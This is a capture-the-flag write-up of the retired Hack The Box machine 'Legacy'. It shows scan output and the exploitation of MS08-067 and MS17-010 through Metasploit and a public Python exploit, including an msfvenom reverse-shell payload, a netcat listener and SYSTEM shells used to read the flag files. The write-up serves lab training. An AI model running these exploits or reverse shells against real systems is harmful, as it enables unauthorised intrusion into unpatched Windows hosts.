Write-up Hack the Box Legacy

My write-up on HTB’s retired machine “Legacy” that outlines using Metasploit and manual exploitation.

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Reconnaissance

First, let’s run nmap with the following switches:

• -Pn = Treat all hosts as online — skip host discovery
• -n = Never do DNS resolution
• -sV = Probe open ports to determine service/version info
• -oN = Output scan in normal and save as .nmap file

nmap -Pn -n -sV --script vuln -oN Cust_10.10.10.4.nmap 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-30 22:08 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.4
Host is up (0.096s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Ports and services that needed to be enumerated further:

• 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
• 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds

Enumeration

Microsoft Windows system vulnerable to remote code execution (MS08–067)

Searching for exploit via ‘searchsploit’

We will start using Metasploit module “exploit/windows/smb/ms08_067_netapi”

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.

References:
https://cvedetails.com/cve/CVE-2008-4250/
OSVDB (49243)
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

Search available module in Metasploit

Setup the module and the target host

Finally, run the exploit and we got meterpreter shell

msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.4:1035) at 2020-01-31 06:09:34 -0500
meterpreter >

Checked to see what access we have by using “getuid” and proceed on gathering more information

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Load system command shell and since we have administrator level, we can easily obtain both user and root flags

meterpreter > shell
Process 748 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd../..
cd../..
C:\>cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017  08:07 ▒▒    <DIR>          .
16/03/2017  08:07 ▒▒    <DIR>          ..
16/03/2017  08:07 ▒▒    <DIR>          Administrator
16/03/2017  07:29 ▒▒    <DIR>          All Users
16/03/2017  07:33 ▒▒    <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.400.843.776 bytes free
C:\Documents and Settings>cd john/'desktop'
cd john/'desktop'
The system cannot find the path specified.
C:\Documents and Settings>cd john/desktop
cd john/desktop
C:\Documents and Settings\john\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

"user flag"

Directory of C:\Documents and Settings\john\Desktop
16/03/2017  08:19 ▒▒    <DIR>          .
16/03/2017  08:19 ▒▒    <DIR>          ..
16/03/2017  08:19 ▒▒                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.400.905.216 bytes free
C:\Documents and Settings\john\Desktop>cd../../Administrator
cd../../Administrator
C:\Documents and Settings\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator
16/03/2017  08:07 ▒▒    <DIR>          .
16/03/2017  08:07 ▒▒    <DIR>          ..
16/03/2017  08:18 ▒▒    <DIR>          Desktop
16/03/2017  08:07 ▒▒    <DIR>          Favorites
16/03/2017  08:07 ▒▒    <DIR>          My Documents
16/03/2017  07:20 ▒▒    <DIR>          Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.400.847.872 bytes free
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

"root flag"

Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017  08:18 ▒▒    <DIR>          .
16/03/2017  08:18 ▒▒    <DIR>          ..
16/03/2017  08:18 ▒▒                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.400.847.872 bytes free
C:\Documents and Settings\Administrator\Desktop>hostname
hostname
legacy
C:\Documents and Settings\Administrator\Desktop>

Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

We will use module 5, ‘exploit/windows/smb/sm17_010_psexec

Description:
This module will exploit SMB with vulnerabilities in MS17–010 to
achieve a write-what-where primitive. This will then be used to
overwrite the connection session information with as an
Administrator session. From there, the normal psexec payload code
execution is done. Exploits a type confusion between Transaction and
WriteAndX requests and a race condition in Transaction requests, as
seen in the EternalRomance, EternalChampion, and EternalSynergy
exploits. This exploit chain is more reliable than the EternalBlue
exploit, but requires a named pipe.

Also known as:
ETERNALSYNERGY
ETERNALROMANCE
ETERNALCHAMPION
ETERNALBLUE

Set the module by defining target host and run the exploit

msf exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x81f09560
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... CYXsdIhC.exe
[*] 10.10.10.4:445 - Created \CYXsdIhC.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \CYXsdIhC.exe...
[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.4:1031) at 2020-01-31 06:57:54 -0500

Checked to see what access we have by using “getuid” and proceed on gathering more information.

Results below showed us that we have access to both user and root flags. No further exploitation is needed.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ../../
cd ../../
C:\>cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
05/02/2020  03:20 ▒▒    <DIR>          .
05/02/2020  03:20 ▒▒    <DIR>          ..
16/03/2017  08:07 ▒▒    <DIR>          Administrator
05/02/2020  03:20 ▒▒                 0 All
16/03/2017  07:29 ▒▒    <DIR>          All Users
05/02/2020  03:20 ▒▒                 0 cd
05/02/2020  03:20 ▒▒                 0 dir
16/03/2017  07:33 ▒▒    <DIR>          john
               3 File(s)              0 bytes
               5 Dir(s)   6.400.479.232 bytes free
C:\Documents and Settings>

Manual exploitation

For our manual exploit for MS17–010, let’s leverage https://github.com/helviojunior/MS17-010

Python exploit is pretty straight forward and does not require any modification other that creating your own reverse shell payload using msfvenom.

root@cainta:~/Documents/htb/Legacy/10.10.10.4/MS17-010# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.37 LPORT=4444 -f exe > eternalblue.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Setup netcat

root@cainta:~/Documents/htb/Legacy/10.10.10.4/MS17-010# rlwrap nc -nlvp 4444
listening on [any] 4444 ...

Execute our exploit + payload

“Foothold”

connect to [10.10.14.37] from (UNKNOWN) [10.10.10.4] 1028
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>hostname
hostname
legacy

“User flag”

Directory of C:\Documents and Settings\john
16/03/2017  08:33 ▒▒    <DIR>          .
16/03/2017  08:33 ▒▒    <DIR>          ..
16/03/2017  09:19 ▒▒    <DIR>          Desktop
16/03/2017  08:33 ▒▒    <DIR>          Favorites
16/03/2017  08:33 ▒▒    <DIR>          My Documents
16/03/2017  08:20 ▒▒    <DIR>          Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.472.708.096 bytes free
C:\Documents and Settings\john>cd Desktop
cd Desktop
C:\Documents and Settings\john\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017  09:19 ▒▒    <DIR>          .
16/03/2017  09:19 ▒▒    <DIR>          ..
16/03/2017  09:19 ▒▒                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.472.708.096 bytes free
C:\Documents and Settings\john\Desktop>

“Root flag”

There is no need to elevate privilege, we have administrator access as well.

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017  09:18 ▒▒    <DIR>          .
16/03/2017  09:18 ▒▒    <DIR>          ..
16/03/2017  09:18 ▒▒                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.472.708.096 bytes free
C:\Documents and Settings\Administrator\Desktop>

References

1. https://github.com/helviojunior/MS17-010
2. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010
3. https://cvedetails.com/cve/CVE-2017-0143/
4. https://cvedetails.com/cve/CVE-2017-0146/
5. https://cvedetails.com/cve/CVE-2017-0147/
6. https://github.com/worawit/MS17-010
7. https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf
8. https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/